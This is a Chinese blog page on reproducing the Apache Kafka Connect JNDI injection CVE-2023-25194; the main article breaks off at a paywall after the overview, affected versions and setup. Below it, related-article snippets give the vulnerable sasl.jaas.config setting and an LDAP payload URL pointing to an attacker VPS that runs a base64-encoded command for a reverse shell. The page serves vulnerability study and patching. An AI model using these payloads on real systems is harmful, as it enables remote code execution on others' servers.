Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)

已于 2023-03-18 23:02:33 修改
阅读量6.7k 收藏 6
点赞数 6
分类专栏: 漏洞复现v1 文章标签: kafka java web安全 网络安全 apache
于 2023-03-18 13:43:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/129634971
版权
本文详细介绍了Apache Kafka Connect的JNDI注入漏洞(CVE-2023-25194),该漏洞可能导致远程代码执行。文章涵盖了漏洞概述、影响范围、复现环境配置、漏洞复现步骤以及修复建议。建议受影响用户升级到Apache Kafka 3.4.0及以上版本或限制JNDI配置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、产品简介

     Kafka Connect是一种用于在Apache Kafka和其他系统之间可扩展且可靠地流式传输数据的工具。它使快速定义将大量数据移入和移出Kafka的连接器变得简单。Kafka Connect可以摄取整个数据库或从所有应用程序服务器收集指标到Kafka主题中,使数据可用于低延迟的流处理。

2、漏洞概述

     在Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。

3、影响范围

    影响版本 

   2.3.0 <= Apache Kafka <= 3.3.2

   不受影响版本

   Apache Kafka >= 3.4.0

4、复现环境

  Windows10搭建Kafka2.4.0集成环境(自行搭建jdk和mysql环境)

我这边使用的是jdk-11.0.18_windows-x64_bin.exe(JDK8也可以,建议使用JDK11)

  mysql 5.7.27</

了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现Apache Druid RCE (CVE-2023-25194) 漏洞
李火火的安全圈
11-01 876
Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流,Kafka Connect 是一种用于在kafka和其它系统之间可扩展、可靠的流式传数据的工具。在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。(其他使用Apache Kafka Connect的产品也可能受CVE-2023-25194漏洞影响)
漏洞复现-Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
玄道的网安博客
08-11 636
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。方法,做完客户端的判断和安全协议的判断之后,调用了。判断 SASL 模式是否开启,开启了才会往下跟进到。方法,跟进,发现其中还是加载了一些配置。方法,最后 Jndi 注入
Apache Kafka Clients JNDI 注入 RCE (CVE-2023-25194)
最新发布
Long___Xiao的博客
02-22 169
Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。验证漏洞存在,开启我们的恶意JNDI服务器,将地址改为指向攻击者服务器的payload,达到反弹shell。
Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
qq_40646572的博客
05-14 3398
2、无法升级的用户可通过验证Kafka Connect连接器配置,仅允许受信任的JNDI配置来缓解此漏洞。在该功能中,将payload填写到Consumer properties属性值中即可。在payload提交前,请先在vps机器中开启ldap服务。在Load data功能页中的Streaming功能中。我是通过vulhub下载的环境,下载后直接启动即可。打开页面,漏洞点在Load data功能页中。使用低版本的jdk中的ldap服务即可。
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞
Fiverya的博客
02-10 3978
CVE-2023-25194漏洞
漏洞预警|Apache Kafka Connect JNDI注入漏洞
LJQClqjc的博客
02-16 702
棱镜七彩漏洞预警
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
Innocence_0的博客
07-22 698
Apache Kafka是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。KafkaConnect是一种用于在kafka和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于SASLJAAS 配置和SASL协议的任意Kafka客户端,对Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行JNDI 注入来实现远程代码执行。
阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​
Ayixy的博客
05-24 912
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 2761
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
kafka-connect-file-pulse::link:多功能的Kafka Connect连接器,可轻松将任何格式的任何文件解析,转换和流式传输到Apache Kafka
02-06
Kafka Connect文件脉冲 Connect FilePulse是多功能,可扩展且可靠的,可轻松将任何格式的任何文件解析,转换和流式传输到Apache Kafka:trade_mark:。 连接FilePulse * 动机 在组织中,经常通过使用各种格式(例如CSV,XML,JSON,Avro等)的文件从旧系统中导出,共享和集成数据。 对于通常会导致复杂且难以维护的数据集成混乱的企业而言,处理所有这些格式可能很快成为一个真正的挑战。 现代方法包括构建可扩展的数据流平台作为中枢神经系统,以使应用程序彼此分离。 Apache Kafka:trade_mark:是构建此类系统的最广泛使用的技术之一。 KafkaApache Kaf
漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞
LJQClqjc的博客
12-23 1161
棱镜七彩漏洞深度分析
【已复现Apache Kafka Connect JNDI注入漏洞(CVE-2023-25194)安全风险通告
smellycat000的专栏
02-09 4337
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Kafka Connect是一种用于在Apache Kafka和其他系统之间可扩展且可靠地流式传输数据的工具。它使快速定义将大量数据移入和移出Kafka的连接器变得简单。Kafka Connect可以摄取整个数据库或从所有应用程序服务器收集指标到Kafka主题中,使数据可用于低延迟的流处理。近日,奇安信CERT监测到A...
Apache Kafka 客户端 JNDI 注入 RCE (CVE-2023-25194
weixin_53639243的博客
02-29 278
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。pache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。
Log4j2 - JNDI 注入漏洞复现CVE-2021-44228)
HAKUNAMATATATTA的博客
05-30 1408
Apache log4j 是 Apache 的一个开源项目, Apache log4j2 是一个 Java 的日志记录工具。该工具重写了 log4j 框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。log4j2 中存在 JNDI 注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析
蚁景网安学院
03-23 1004
Apache Kafka是一个开源的分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4793
log4j2 JNDI注入漏洞问题复现
Kafka配置详解-Connect配置
zqqcometo的专栏
12-19 4802
转载自:http://orchome.com/537 3.5 Kafka Connect Configs Kafka Connect框架的相关配置(注意,窗口可向右拉动)。 NAME DESCRIPTION TYPE DEFAULT VALID VALUES IMPORTANCE config.storage.topic kafka topic仓库配置 st...
CVE-2023-3519
07-27
很抱歉,我无法找到关于CVE-2023-3519的相关信息。请确认该CVE编号是否正确,并提供更多的背景信息,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [struts2-core-2.3.15.1遇到两个漏洞升级最新版【Struts 2.5.26】](https://blog.csdn.net/JEFFYU328/article/details/115907882)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析](https://blog.csdn.net/qq_38154820/article/details/129731587)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值